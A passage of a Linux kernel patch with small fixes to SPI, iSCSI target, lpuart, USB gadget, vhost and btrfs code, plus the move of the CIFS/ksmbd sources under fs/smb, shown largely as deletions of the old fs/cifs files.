+ 			dev_dbg(mas->dev, "Using GPI DMA mode for SPI\n");
+ 			break;
++		} else if (ret == -EPROBE_DEFER) {
++			goto out_pm;
+ 		}
+ 		/*
+ 		 * in case of failure to get dma channel, we can still do the
+diff --git a/drivers/target/iscsi/iscsi_target_nego.c b/drivers/target/iscsi/iscsi_target_nego.c
+index ff49c8f3fe241..62b2d0dcfda86 100644
+--- a/drivers/target/iscsi/iscsi_target_nego.c
++++ b/drivers/target/iscsi/iscsi_target_nego.c
+@@ -1128,6 +1128,7 @@ int iscsi_target_locate_portal(
+ 	iscsi_target_set_sock_callbacks(conn);
+ 
+ 	login->np = np;
++	conn->tpg = NULL;
+ 
+ 	login_req = (struct iscsi_login_req *) login->req;
+ 	payload_length = ntoh24(login_req->dlength);
+@@ -1195,7 +1196,6 @@ int iscsi_target_locate_portal(
+ 	 */
+ 	sessiontype = strncmp(s_buf, DISCOVERY, 9);
+ 	if (!sessiontype) {
+-		conn->tpg = iscsit_global->discovery_tpg;
+ 		if (!login->leading_connection)
+ 			goto get_target;
+ 
+@@ -1212,9 +1212,11 @@ int iscsi_target_locate_portal(
+ 		 * Serialize access across the discovery struct iscsi_portal_group to
+ 		 * process login attempt.
+ 		 */
++		conn->tpg = iscsit_global->discovery_tpg;
+ 		if (iscsit_access_np(np, conn->tpg) < 0) {
+ 			iscsit_tx_login_rsp(conn, ISCSI_STATUS_CLS_TARGET_ERR,
+ 				ISCSI_LOGIN_STATUS_SVC_UNAVAILABLE);
++			conn->tpg = NULL;
+ 			ret = -1;
+ 			goto out;
+ 		}
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index dc7ac1ddbca5e..1093c74b52840 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -257,6 +257,7 @@ struct lpuart_port {
+ 	unsigned int		txfifo_size;
+ 	unsigned int		rxfifo_size;
+ 
++	u8			rx_watermark;
+ 	bool			lpuart_dma_tx_use;
+ 	bool			lpuart_dma_rx_use;
+ 	struct dma_chan		*dma_tx_chan;
+@@ -283,38 +284,45 @@ struct lpuart_soc_data {
+ 	enum lpuart_type devtype;
+ 	char iotype;
+ 	u8 reg_off;
++	u8 rx_watermark;
+ };
+ 
+ static const struct lpuart_soc_data vf_data = {
+ 	.devtype = VF610_LPUART,
+ 	.iotype = UPIO_MEM,
++	.rx_watermark = 1,
+ };
+ 
+ static const struct lpuart_soc_data ls1021a_data = {
+ 	.devtype = LS1021A_LPUART,
+ 	.iotype = UPIO_MEM32BE,
++	.rx_watermark = 1,
+ };
+ 
+ static const struct lpuart_soc_data ls1028a_data = {
+ 	.devtype = LS1028A_LPUART,
+ 	.iotype = UPIO_MEM32,
++	.rx_watermark = 0,
+ };
+ 
+ static struct lpuart_soc_data imx7ulp_data = {
+ 	.devtype = IMX7ULP_LPUART,
+ 	.iotype = UPIO_MEM32,
+ 	.reg_off = IMX_REG_OFF,
++	.rx_watermark = 1,
+ };
+ 
+ static struct lpuart_soc_data imx8qxp_data = {
+ 	.devtype = IMX8QXP_LPUART,
+ 	.iotype = UPIO_MEM32,
+ 	.reg_off = IMX_REG_OFF,
++	.rx_watermark = 1,
+ };
+ static struct lpuart_soc_data imxrt1050_data = {
+ 	.devtype = IMXRT1050_LPUART,
+ 	.iotype = UPIO_MEM32,
+ 	.reg_off = IMX_REG_OFF,
++	.rx_watermark = 1,
+ };
+ 
+ static const struct of_device_id lpuart_dt_ids[] = {
+@@ -1533,7 +1541,7 @@ static void lpuart_setup_watermark(struct lpuart_port *sport)
+ 	}
+ 
+ 	writeb(0, sport->port.membase + UARTTWFIFO);
+-	writeb(1, sport->port.membase + UARTRWFIFO);
++	writeb(sport->rx_watermark, sport->port.membase + UARTRWFIFO);
+ 
+ 	/* Restore cr2 */
+ 	writeb(cr2_saved, sport->port.membase + UARTCR2);
+@@ -1568,7 +1576,8 @@ static void lpuart32_setup_watermark(struct lpuart_port *sport)
+ 	lpuart32_write(&sport->port, val, UARTFIFO);
+ 
+ 	/* set the watermark */
+-	val = (0x1 << UARTWATER_RXWATER_OFF) | (0x0 << UARTWATER_TXWATER_OFF);
++	val = (sport->rx_watermark << UARTWATER_RXWATER_OFF) |
++	      (0x0 << UARTWATER_TXWATER_OFF);
+ 	lpuart32_write(&sport->port, val, UARTWATER);
+ 
+ 	/* Restore cr2 */
+@@ -2714,6 +2723,7 @@ static int lpuart_probe(struct platform_device *pdev)
+ 	sport->port.dev = &pdev->dev;
+ 	sport->port.type = PORT_LPUART;
+ 	sport->devtype = sdata->devtype;
++	sport->rx_watermark = sdata->rx_watermark;
+ 	ret = platform_get_irq(pdev, 0);
+ 	if (ret < 0)
+ 		return ret;
+diff --git a/drivers/usb/gadget/udc/amd5536udc_pci.c b/drivers/usb/gadget/udc/amd5536udc_pci.c
+index c80f9bd51b750..a36913ae31f9e 100644
+--- a/drivers/usb/gadget/udc/amd5536udc_pci.c
++++ b/drivers/usb/gadget/udc/amd5536udc_pci.c
+@@ -170,6 +170,9 @@ static int udc_pci_probe(
+ 		retval = -ENODEV;
+ 		goto err_probe;
+ 	}
++
++	udc = dev;
++
+ 	return 0;
+ 
+ err_probe:
+diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c
+index 4c538b30fd76d..4418192ab8aaa 100644
+--- a/drivers/vhost/net.c
++++ b/drivers/vhost/net.c
+@@ -934,13 +934,18 @@ static void handle_tx_zerocopy(struct vhost_net *net, struct socket *sock)
+ 
+ 		err = sock->ops->sendmsg(sock, &msg, len);
+ 		if (unlikely(err < 0)) {
++			bool retry = err == -EAGAIN || err == -ENOMEM || err == -ENOBUFS;
++
+ 			if (zcopy_used) {
+ 				if (vq->heads[ubuf->desc].len == VHOST_DMA_IN_PROGRESS)
+ 					vhost_net_ubuf_put(ubufs);
+-				nvq->upend_idx = ((unsigned)nvq->upend_idx - 1)
+-					% UIO_MAXIOV;
++				if (retry)
++					nvq->upend_idx = ((unsigned)nvq->upend_idx - 1)
++						% UIO_MAXIOV;
++				else
++					vq->heads[ubuf->desc].len = VHOST_DMA_DONE_LEN;
+ 			}
+-			if (err == -EAGAIN || err == -ENOMEM || err == -ENOBUFS) {
++			if (retry) {
+ 				vhost_discard_vq_desc(vq, 1);
+ 				vhost_net_enable_vq(net, vq);
+ 				break;
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index d591f77961aa8..31a156669a531 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -377,7 +377,10 @@ static long vhost_vdpa_set_features(struct vhost_vdpa *v, u64 __user *featurep)
+ {
+ 	struct vdpa_device *vdpa = v->vdpa;
+ 	const struct vdpa_config_ops *ops = vdpa->config;
++	struct vhost_dev *d = &v->vdev;
++	u64 actual_features;
+ 	u64 features;
++	int i;
+ 
+ 	/*
+ 	 * It's not allowed to change the features after they have
+@@ -392,6 +395,16 @@ static long vhost_vdpa_set_features(struct vhost_vdpa *v, u64 __user *featurep)
+ 	if (vdpa_set_features(vdpa, features))
+ 		return -EINVAL;
+ 
++	/* let the vqs know what has been configured */
++	actual_features = ops->get_driver_features(vdpa);
++	for (i = 0; i < d->nvqs; ++i) {
++		struct vhost_virtqueue *vq = d->vqs[i];
++
++		mutex_lock(&vq->mutex);
++		vq->acked_features = actual_features;
++		mutex_unlock(&vq->mutex);
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/fs/Kconfig b/fs/Kconfig
+index 2685a4d0d3531..703a1cea0fc09 100644
+--- a/fs/Kconfig
++++ b/fs/Kconfig
+@@ -371,14 +371,7 @@ config NFS_V4_2_SSC_HELPER
+ source "net/sunrpc/Kconfig"
+ source "fs/ceph/Kconfig"
+ 
+-source "fs/cifs/Kconfig"
+-source "fs/ksmbd/Kconfig"
+-
+-config SMBFS_COMMON
+-	tristate
+-	default y if CIFS=y || SMB_SERVER=y
+-	default m if CIFS=m || SMB_SERVER=m
+-
++source "fs/smb/Kconfig"
+ source "fs/coda/Kconfig"
+ source "fs/afs/Kconfig"
+ source "fs/9p/Kconfig"
+diff --git a/fs/Makefile b/fs/Makefile
+index 80ab0154419ec..9b7bcf6e54cd4 100644
+--- a/fs/Makefile
++++ b/fs/Makefile
+@@ -94,9 +94,7 @@ obj-$(CONFIG_LOCKD)		+= lockd/
+ obj-$(CONFIG_NLS)		+= nls/
+ obj-y				+= unicode/
+ obj-$(CONFIG_SYSV_FS)		+= sysv/
+-obj-$(CONFIG_SMBFS_COMMON)	+= smbfs_common/
+-obj-$(CONFIG_CIFS)		+= cifs/
+-obj-$(CONFIG_SMB_SERVER)	+= ksmbd/
++obj-$(CONFIG_SMBFS)		+= smb/
+ obj-$(CONFIG_HPFS_FS)		+= hpfs/
+ obj-$(CONFIG_NTFS_FS)		+= ntfs/
+ obj-$(CONFIG_NTFS3_FS)		+= ntfs3/
+diff --git a/fs/btrfs/tree-log.c b/fs/btrfs/tree-log.c
+index e71464c0e4667..00be69ce7b90f 100644
+--- a/fs/btrfs/tree-log.c
++++ b/fs/btrfs/tree-log.c
+@@ -6205,7 +6205,7 @@ static int log_delayed_deletions_incremental(struct btrfs_trans_handle *trans,
+ {
+ 	struct btrfs_root *log = inode->root->log_root;
+ 	const struct btrfs_delayed_item *curr;
+-	u64 last_range_start;
++	u64 last_range_start = 0;
+ 	u64 last_range_end = 0;
+ 	struct btrfs_key key;
+ 
+diff --git a/fs/cifs/Kconfig b/fs/cifs/Kconfig
+deleted file mode 100644
+index 3b7e3b9e4fd2e..0000000000000
+--- a/fs/cifs/Kconfig
++++ /dev/null
+@@ -1,203 +0,0 @@
+-# SPDX-License-Identifier: GPL-2.0-only
+-config CIFS
+-	tristate "SMB3 and CIFS support (advanced network filesystem)"
+-	depends on INET
+-	select NLS
+-	select CRYPTO
+-	select CRYPTO_MD5
+-	select CRYPTO_SHA256
+-	select CRYPTO_SHA512
+-	select CRYPTO_CMAC
+-	select CRYPTO_HMAC
+-	select CRYPTO_AEAD2
+-	select CRYPTO_CCM
+-	select CRYPTO_GCM
+-	select CRYPTO_ECB
+-	select CRYPTO_AES
+-	select KEYS
+-	select DNS_RESOLVER
+-	select ASN1
+-	select OID_REGISTRY
+-	help
+-	  This is the client VFS module for the SMB3 family of NAS protocols,
+-	  (including support for the most recent, most secure dialect SMB3.1.1)
+-	  as well as for earlier dialects such as SMB2.1, SMB2 and the older
+-	  Common Internet File System (CIFS) protocol.  CIFS was the successor
+-	  to the original dialect, the Server Message Block (SMB) protocol, the
+-	  native file sharing mechanism for most early PC operating systems.
+-
+-	  The SMB3 protocol is supported by most modern operating systems
+-	  and NAS appliances (e.g. Samba, Windows 10, Windows Server 2016,
+-	  MacOS) and even in the cloud (e.g. Microsoft Azure).
+-	  The older CIFS protocol was included in Windows NT4, 2000 and XP (and
+-	  later) as well by Samba (which provides excellent CIFS and SMB3
+-	  server support for Linux and many other operating systems). Use of
+-	  dialects older than SMB2.1 is often discouraged on public networks.
+-	  This module also provides limited support for OS/2 and Windows ME
+-	  and similar very old servers.
+-
+-	  This module provides an advanced network file system client
+-	  for mounting to SMB3 (and CIFS) compliant servers.  It includes
+-	  support for DFS (hierarchical name space), secure per-user
+-	  session establishment via Kerberos or NTLM or NTLMv2, RDMA
+-	  (smbdirect), advanced security features, per-share encryption,
+-	  directory leases, safe distributed caching (oplock), optional packet
+-	  signing, Unicode and other internationalization improvements.
+-
+-	  In general, the default dialects, SMB3 and later, enable better
+-	  performance, security and features, than would be possible with CIFS.
+-	  Note that when mounting to Samba, due to the CIFS POSIX extensions,
+-	  CIFS mounts can provide slightly better POSIX compatibility
+-	  than SMB3 mounts. SMB2/SMB3 mount options are also
+-	  slightly simpler (compared to CIFS) due to protocol improvements.
+-
+-	  If you need to mount to Samba, Azure, Macs or Windows from this machine, say Y.
+-
+-config CIFS_STATS2
+-	bool "Extended statistics"
+-	depends on CIFS
+-	default y
+-	help
+-	  Enabling this option will allow more detailed statistics on SMB
+-	  request timing to be displayed in /proc/fs/cifs/DebugData and also
+-	  allow optional logging of slow responses to dmesg (depending on the
+-	  value of /proc/fs/cifs/cifsFYI). See Documentation/admin-guide/cifs/usage.rst
+-	  for more details. These additional statistics may have a minor effect
+-	  on performance and memory utilization.
+-
+-	  If unsure, say Y.
+-
+-config CIFS_ALLOW_INSECURE_LEGACY
+-	bool "Support legacy servers which use less secure dialects"
+-	depends on CIFS
+-	default y
+-	help
+-	  Modern dialects, SMB2.1 and later (including SMB3 and 3.1.1), have
+-	  additional security features, including protection against
+-	  man-in-the-middle attacks and stronger crypto hashes, so the use
+-	  of legacy dialects (SMB1/CIFS and SMB2.0) is discouraged.
+-
+-	  Disabling this option prevents users from using vers=1.0 or vers=2.0
+-	  on mounts with cifs.ko
+-
+-	  If unsure, say Y.
+-
+-config CIFS_UPCALL
+-	bool "Kerberos/SPNEGO advanced session setup"
+-	depends on CIFS
+-	help
+-	  Enables an upcall mechanism for CIFS which accesses userspace helper
+-	  utilities to provide SPNEGO packaged (RFC 4178) Kerberos tickets
+-	  which are needed to mount to certain secure servers (for which more
+-	  secure Kerberos authentication is required). If unsure, say Y.
+-
+-config CIFS_XATTR
+-	bool "CIFS extended attributes"
+-	depends on CIFS
+-	help
+-	  Extended attributes are name:value pairs associated with inodes by
+-	  the kernel or by users (see the attr(5) manual page for details).
+-	  CIFS maps the name of extended attributes beginning with the user
+-	  namespace prefix to SMB/CIFS EAs.  EAs are stored on Windows
+-	  servers without the user namespace prefix, but their names are
+-	  seen by Linux cifs clients prefaced by the user namespace prefix.
+-	  The system namespace (used by some filesystems to store ACLs) is
+-	  not supported at this time.
+-
+-	  If unsure, say Y.
+-
+-config CIFS_POSIX
+-	bool "CIFS POSIX Extensions"
+-	depends on CIFS && CIFS_ALLOW_INSECURE_LEGACY && CIFS_XATTR
+-	help
+-	  Enabling this option will cause the cifs client to attempt to
+-	  negotiate a newer dialect with servers, such as Samba 3.0.5
+-	  or later, that optionally can handle more POSIX like (rather
+-	  than Windows like) file behavior.  It also enables
+-	  support for POSIX ACLs (getfacl and setfacl) to servers
+-	  (such as Samba 3.10 and later) which can negotiate
+-	  CIFS POSIX ACL support.  If unsure, say N.
+-
+-config CIFS_DEBUG
+-	bool "Enable CIFS debugging routines"
+-	default y
+-	depends on CIFS
+-	help
+-	  Enabling this option adds helpful debugging messages to
+-	  the cifs code which increases the size of the cifs module.
+-	  If unsure, say Y.
+-
+-config CIFS_DEBUG2
+-	bool "Enable additional CIFS debugging routines"
+-	depends on CIFS_DEBUG
+-	help
+-	  Enabling this option adds a few more debugging routines
+-	  to the cifs code which slightly increases the size of
+-	  the cifs module and can cause additional logging of debug
+-	  messages in some error paths, slowing performance. This
+-	  option can be turned off unless you are debugging
+-	  cifs problems.  If unsure, say N.
+-
+-config CIFS_DEBUG_DUMP_KEYS
+-	bool "Dump encryption keys for offline decryption (Unsafe)"
+-	depends on CIFS_DEBUG
+-	help
+-	  Enabling this will dump the encryption and decryption keys
+-	  used to communicate on an encrypted share connection on the
+-	  console. This allows Wireshark to decrypt and dissect
+-	  encrypted network captures. Enable this carefully.
+-	  If unsure, say N.
+-
+-config CIFS_DFS_UPCALL
+-	bool "DFS feature support"
+-	depends on CIFS
+-	help
+-	  Distributed File System (DFS) support is used to access shares
+-	  transparently in an enterprise name space, even if the share
+-	  moves to a different server.  This feature also enables
+-	  an upcall mechanism for CIFS which contacts userspace helper
+-	  utilities to provide server name resolution (host names to
+-	  IP addresses) which is needed in order to reconnect to
+-	  servers if their addresses change or for implicit mounts of
+-	  DFS junction points. If unsure, say Y.
+-
+-config CIFS_SWN_UPCALL
+-	bool "SWN feature support"
+-	depends on CIFS
+-	help
+-	  The Service Witness Protocol (SWN) is used to get notifications
+-	  from a highly available server of resource state changes. This
+-	  feature enables an upcall mechanism for CIFS which contacts a
+-	  userspace daemon to establish the DCE/RPC connection to retrieve
+-	  the cluster available interfaces and resource change notifications.
+-	  If unsure, say Y.
+-
+-config CIFS_NFSD_EXPORT
+-	bool "Allow nfsd to export CIFS file system"
+-	depends on CIFS && BROKEN
+-	help
+-	  Allows NFS server to export a CIFS mounted share (nfsd over cifs)
+-
+-config CIFS_SMB_DIRECT
+-	bool "SMB Direct support"
+-	depends on CIFS=m && INFINIBAND && INFINIBAND_ADDR_TRANS || CIFS=y && INFINIBAND=y && INFINIBAND_ADDR_TRANS=y
+-	help
+-	  Enables SMB Direct support for SMB 3.0, 3.02 and 3.1.1.
+-	  SMB Direct allows transferring SMB packets over RDMA. If unsure,
+-	  say Y.
+-
+-config CIFS_FSCACHE
+-	bool "Provide CIFS client caching support"
+-	depends on CIFS=m && FSCACHE || CIFS=y && FSCACHE=y
+-	help
+-	  Makes CIFS FS-Cache capable. Say Y here if you want your CIFS data
+-	  to be cached locally on disk through the general filesystem cache
+-	  manager. If unsure, say N.
+-
+-config CIFS_ROOT
+-	bool "SMB root file system (Experimental)"
+-	depends on CIFS=y && IP_PNP
+-	help
+-	  Enables root file system support over SMB protocol.
+-
+-	  Most people say N here.
+diff --git a/fs/cifs/Makefile b/fs/cifs/Makefile
+deleted file mode 100644
+index 7c9785973f496..0000000000000
+--- a/fs/cifs/Makefile
++++ /dev/null
+@@ -1,34 +0,0 @@
+-# SPDX-License-Identifier: GPL-2.0
+-#
+-# Makefile for Linux CIFS/SMB2/SMB3 VFS client
+-#
+-ccflags-y += -I$(src)		# needed for trace events
+-obj-$(CONFIG_CIFS) += cifs.o
+-
+-cifs-y := trace.o cifsfs.o cifs_debug.o connect.o dir.o file.o \
+-	  inode.o link.o misc.o netmisc.o smbencrypt.o transport.o \
+-	  cached_dir.o cifs_unicode.o nterr.o cifsencrypt.o \
+-	  readdir.o ioctl.o sess.o export.o unc.o winucase.o \
+-	  smb2ops.o smb2maperror.o smb2transport.o \
+-	  smb2misc.o smb2pdu.o smb2inode.o smb2file.o cifsacl.o fs_context.o \
+-	  dns_resolve.o cifs_spnego_negtokeninit.asn1.o asn1.o
+-
+-$(obj)/asn1.o: $(obj)/cifs_spnego_negtokeninit.asn1.h
+-
+-$(obj)/cifs_spnego_negtokeninit.asn1.o: $(obj)/cifs_spnego_negtokeninit.asn1.c $(obj)/cifs_spnego_negtokeninit.asn1.h
+-
+-cifs-$(CONFIG_CIFS_XATTR) += xattr.o
+-
+-cifs-$(CONFIG_CIFS_UPCALL) += cifs_spnego.o
+-
+-cifs-$(CONFIG_CIFS_DFS_UPCALL) += cifs_dfs_ref.o dfs_cache.o
+-
+-cifs-$(CONFIG_CIFS_SWN_UPCALL) += netlink.o cifs_swn.o
+-
+-cifs-$(CONFIG_CIFS_FSCACHE) += fscache.o
+-
+-cifs-$(CONFIG_CIFS_SMB_DIRECT) += smbdirect.o
+-
+-cifs-$(CONFIG_CIFS_ROOT) += cifsroot.o
+-
+-cifs-$(CONFIG_CIFS_ALLOW_INSECURE_LEGACY) += smb1ops.o cifssmb.o
+diff --git a/fs/cifs/asn1.c b/fs/cifs/asn1.c
+deleted file mode 100644
+index b5724ef9f182f..0000000000000
+--- a/fs/cifs/asn1.c
++++ /dev/null
+@@ -1,63 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-
+-#include <linux/module.h>
+-#include <linux/kernel.h>
+-#include <linux/oid_registry.h>
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "cifsproto.h"
+-#include "cifs_spnego_negtokeninit.asn1.h"
+-
+-int
+-decode_negTokenInit(unsigned char *security_blob, int length,
+-		    struct TCP_Server_Info *server)
+-{
+-	if (asn1_ber_decoder(&cifs_spnego_negtokeninit_decoder, server,
+-			     security_blob, length) == 0)
+-		return 1;
+-	else
+-		return 0;
+-}
+-
+-int cifs_gssapi_this_mech(void *context, size_t hdrlen,
+-			  unsigned char tag, const void *value, size_t vlen)
+-{
+-	enum OID oid;
+-
+-	oid = look_up_OID(value, vlen);
+-	if (oid != OID_spnego) {
+-		char buf[50];
+-
+-		sprint_oid(value, vlen, buf, sizeof(buf));
+-		cifs_dbg(FYI, "Error decoding negTokenInit header: unexpected OID %s\n",
+-			 buf);
+-		return -EBADMSG;
+-	}
+-	return 0;
+-}
+-
+-int cifs_neg_token_init_mech_type(void *context, size_t hdrlen,
+-				  unsigned char tag,
+-				  const void *value, size_t vlen)
+-{
+-	struct TCP_Server_Info *server = context;
+-	enum OID oid;
+-
+-	oid = look_up_OID(value, vlen);
+-	if (oid == OID_mskrb5)
+-		server->sec_mskerberos = true;
+-	else if (oid == OID_krb5u2u)
+-		server->sec_kerberosu2u = true;
+-	else if (oid == OID_krb5)
+-		server->sec_kerberos = true;
+-	else if (oid == OID_ntlmssp)
+-		server->sec_ntlmssp = true;
+-	else {
+-		char buf[50];
+-
+-		sprint_oid(value, vlen, buf, sizeof(buf));
+-		cifs_dbg(FYI, "Decoding negTokenInit: unsupported OID %s\n",
+-			 buf);
+-	}
+-	return 0;
+-}
+diff --git a/fs/cifs/cached_dir.c b/fs/cifs/cached_dir.c
+deleted file mode 100644
+index bfc964b36c72e..0000000000000
+--- a/fs/cifs/cached_dir.c
++++ /dev/null
+@@ -1,606 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- *  Functions to handle the cached directory entries
+- *
+- *  Copyright (c) 2022, Ronnie Sahlberg <lsahlber@redhat.com>
+- */
+-
+-#include <linux/namei.h>
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "smb2proto.h"
+-#include "cached_dir.h"
+-
+-static struct cached_fid *init_cached_dir(const char *path);
+-static void free_cached_dir(struct cached_fid *cfid);
+-static void smb2_close_cached_fid(struct kref *ref);
+-
+-static struct cached_fid *find_or_create_cached_dir(struct cached_fids *cfids,
+-						    const char *path,
+-						    bool lookup_only)
+-{
+-	struct cached_fid *cfid;
+-
+-	spin_lock(&cfids->cfid_list_lock);
+-	list_for_each_entry(cfid, &cfids->entries, entry) {
+-		if (!strcmp(cfid->path, path)) {
+-			/*
+-			 * If it doesn't have a lease it is either not yet
+-			 * fully cached or it may be in the process of
+-			 * being deleted due to a lease break.
+-			 */
+-			if (!cfid->has_lease) {
+-				spin_unlock(&cfids->cfid_list_lock);
+-				return NULL;
+-			}
+-			kref_get(&cfid->refcount);
+-			spin_unlock(&cfids->cfid_list_lock);
+-			return cfid;
+-		}
+-	}
+-	if (lookup_only) {
+-		spin_unlock(&cfids->cfid_list_lock);
+-		return NULL;
+-	}
+-	if (cfids->num_entries >= MAX_CACHED_FIDS) {
+-		spin_unlock(&cfids->cfid_list_lock);
+-		return NULL;
+-	}
+-	cfid = init_cached_dir(path);
+-	if (cfid == NULL) {
+-		spin_unlock(&cfids->cfid_list_lock);
+-		return NULL;
+-	}
+-	cfid->cfids = cfids;
+-	cfids->num_entries++;
+-	list_add(&cfid->entry, &cfids->entries);
+-	cfid->on_list = true;
+-	kref_get(&cfid->refcount);
+-	spin_unlock(&cfids->cfid_list_lock);
+-	return cfid;
+-}
+-
+-static struct dentry *
+-path_to_dentry(struct cifs_sb_info *cifs_sb, const char *path)
+-{
+-	struct dentry *dentry;
+-	const char *s, *p;
+-	char sep;
+-
+-	sep = CIFS_DIR_SEP(cifs_sb);
+-	dentry = dget(cifs_sb->root);
+-	s = path;
+-
+-	do {
+-		struct inode *dir = d_inode(dentry);
+-		struct dentry *child;
+-
+-		if (!S_ISDIR(dir->i_mode)) {
+-			dput(dentry);
+-			dentry = ERR_PTR(-ENOTDIR);
+-			break;
+-		}
+-
+-		/* skip separators */
+-		while (*s == sep)
+-			s++;
+-		if (!*s)
+-			break;
+-		p = s++;
+-		/* next separator */
+-		while (*s && *s != sep)
+-			s++;
+-
+-		child = lookup_positive_unlocked(p, dentry, s - p);
+-		dput(dentry);
+-		dentry = child;
+-	} while (!IS_ERR(dentry));
+-	return dentry;
+-}
+-
+-static const char *path_no_prefix(struct cifs_sb_info *cifs_sb,
+-				  const char *path)
+-{
+-	size_t len = 0;
+-
+-	if (!*path)
+-		return path;
+-
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
+-	    cifs_sb->prepath) {
+-		len = strlen(cifs_sb->prepath) + 1;
+-		if (unlikely(len > strlen(path)))
+-			return ERR_PTR(-EINVAL);
+-	}
+-	return path + len;
+-}
+-
+-/*
+- * Open the and cache a directory handle.
+- * If error then *cfid is not initialized.
+- */
+-int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+-		    const char *path,
+-		    struct cifs_sb_info *cifs_sb,
+-		    bool lookup_only, struct cached_fid **ret_cfid)
+-{
+-	struct cifs_ses *ses;
+-	struct TCP_Server_Info *server;
+-	struct cifs_open_parms oparms;
+-	struct smb2_create_rsp *o_rsp = NULL;
+-	struct smb2_query_info_rsp *qi_rsp = NULL;
+-	int resp_buftype[2];
+-	struct smb_rqst rqst[2];
+-	struct kvec rsp_iov[2];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec qi_iov[1];
+-	int rc, flags = 0;
+-	__le16 *utf16_path = NULL;
+-	u8 oplock = SMB2_OPLOCK_LEVEL_II;
+-	struct cifs_fid *pfid;
+-	struct dentry *dentry = NULL;
+-	struct cached_fid *cfid;
+-	struct cached_fids *cfids;
+-	const char *npath;
+-
+-	if (tcon == NULL || tcon->cfids == NULL || tcon->nohandlecache ||
+-	    is_smb1_server(tcon->ses->server))
+-		return -EOPNOTSUPP;
+-
+-	ses = tcon->ses;
+-	server = ses->server;
+-	cfids = tcon->cfids;
+-
+-	if (!server->ops->new_lease_key)
+-		return -EIO;
+-
+-	if (cifs_sb->root == NULL)
+-		return -ENOENT;
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	cfid = find_or_create_cached_dir(cfids, path, lookup_only);
+-	if (cfid == NULL) {
+-		kfree(utf16_path);
+-		return -ENOENT;
+-	}
+-	/*
+-	 * At this point we either have a lease already and we can just
+-	 * return it. If not we are guaranteed to be the only thread accessing
+-	 * this cfid.
+-	 */
+-	if (cfid->has_lease) {
+-		*ret_cfid = cfid;
+-		kfree(utf16_path);
+-		return 0;
+-	}
+-
+-	/*
+-	 * Skip any prefix paths in @path as lookup_positive_unlocked() ends up
+-	 * calling ->lookup() which already adds those through
+-	 * build_path_from_dentry().  Also, do it earlier as we might reconnect
+-	 * below when trying to send compounded request and then potentially
+-	 * having a different prefix path (e.g. after DFS failover).
+-	 */
+-	npath = path_no_prefix(cifs_sb, path);
+-	if (IS_ERR(npath)) {
+-		rc = PTR_ERR(npath);
+-		kfree(utf16_path);
+-		return rc;
+-	}
+-
+-	/*
+-	 * We do not hold the lock for the open because in case
+-	 * SMB2_open needs to reconnect.
+-	 * This is safe because no other thread will be able to get a ref
+-	 * to the cfid until we have finished opening the file and (possibly)
+-	 * acquired a lease.
+-	 */
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	pfid = &cfid->fid;
+-	server->ops->new_lease_key(pfid);
+-
+-	memset(rqst, 0, sizeof(rqst));
+-	resp_buftype[0] = resp_buftype[1] = CIFS_NO_BUFFER;
+-	memset(rsp_iov, 0, sizeof(rsp_iov));
+-
+-	/* Open */
+-	memset(&open_iov, 0, sizeof(open_iov));
+-	rqst[0].rq_iov = open_iov;
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = path,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.fid = pfid,
+-	};
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, utf16_path);
+-	if (rc)
+-		goto oshr_free;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-	memset(&qi_iov, 0, sizeof(qi_iov));
+-	rqst[1].rq_iov = qi_iov;
+-	rqst[1].rq_nvec = 1;
+-
+-	rc = SMB2_query_info_init(tcon, server,
+-				  &rqst[1], COMPOUND_FID,
+-				  COMPOUND_FID, FILE_ALL_INFORMATION,
+-				  SMB2_O_INFO_FILE, 0,
+-				  sizeof(struct smb2_file_all_info) +
+-				  PATH_MAX * 2, 0, NULL);
+-	if (rc)
+-		goto oshr_free;
+-
+-	smb2_set_related(&rqst[1]);
+-
+-	rc = compound_send_recv(xid, ses, server,
+-				flags, 2, rqst,
+-				resp_buftype, rsp_iov);
+-	if (rc) {
+-		if (rc == -EREMCHG) {
+-			tcon->need_reconnect = true;
+-			pr_warn_once("server share %s deleted\n",
+-				     tcon->tree_name);
+-		}
+-		goto oshr_free;
+-	}
+-	cfid->tcon = tcon;
+-	cfid->is_open = true;
+-
+-	o_rsp = (struct smb2_create_rsp *)rsp_iov[0].iov_base;
+-	oparms.fid->persistent_fid = o_rsp->PersistentFileId;
+-	oparms.fid->volatile_fid = o_rsp->VolatileFileId;
+-#ifdef CONFIG_CIFS_DEBUG2
+-	oparms.fid->mid = le64_to_cpu(o_rsp->hdr.MessageId);
+-#endif /* CIFS_DEBUG2 */
+-
+-	if (o_rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
+-		goto oshr_free;
+-
+-	smb2_parse_contexts(server, o_rsp,
+-			    &oparms.fid->epoch,
+-			    oparms.fid->lease_key, &oplock,
+-			    NULL, NULL);
+-	if (!(oplock & SMB2_LEASE_READ_CACHING_HE))
+-		goto oshr_free;
+-	qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
